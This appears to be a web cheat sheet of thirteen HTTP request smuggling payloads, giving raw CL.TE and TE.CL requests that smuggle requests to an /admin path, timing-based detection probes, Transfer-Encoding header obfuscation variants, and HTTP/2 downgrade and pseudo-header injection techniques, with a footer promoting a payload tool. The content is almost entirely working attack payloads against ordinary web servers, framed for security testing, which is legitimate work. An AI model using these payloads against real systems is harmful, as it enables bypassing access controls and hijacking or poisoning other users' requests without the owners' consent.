HTTP Request Smuggling Cheat Sheet

HTTP request smuggling payloads for CL.TE, TE.CL, TE.TE desync, and HTTP/2 downgrade attacks. (13 payloads)

CL.TE (Front: Content-Length, Back: Transfer-Encoding)

(2)

POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /admin HTTP/1.1\r\n\r\n

Basic CL.TE smuggle to /admin

POST / HTTP/1.1\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nG

CL.TE detection (differential timing)

TE.CL (Front: Transfer-Encoding, Back: Content-Length)

(2)

POST / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n5c\r\nGPOST /admin HTTP/1.1\r\nContent-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n

Basic TE.CL smuggle to /admin

POST / HTTP/1.1\r\nContent-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nZ\r\nQ

TE.CL detection

TE.TE (Transfer-Encoding Obfuscation)

(6)

Transfer-Encoding: chunked\r\nTransfer-encoding: cow

Case variation in second header

Transfer-Encoding : chunked

Space before colon

Transfer-Encoding: chunked\r\nTransfer-Encoding: identity

Duplicate TE headers

Transfer-Encoding:\tchunked

Tab character separator

Transfer-Encoding:\nchunked

Newline in value

X: x\nTransfer-Encoding: chunked

Header injection to add TE

HTTP/2 Techniques

(3)

Send HTTP/2 with injected \r\n in header value

HTTP/2 → HTTP/1.1 downgrade smuggling

:method: GET\r\nTransfer-Encoding: chunked

H2 pseudo-header injection

Use HTTP/2 CONNECT for tunneling

HTTP/2 tunnel smuggling

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

CRLF Injection HTTP Request Smuggling

Related Cheat Sheets

CRLF Injection Cheat Sheet WAF Bypass Cheat Sheet

$loading...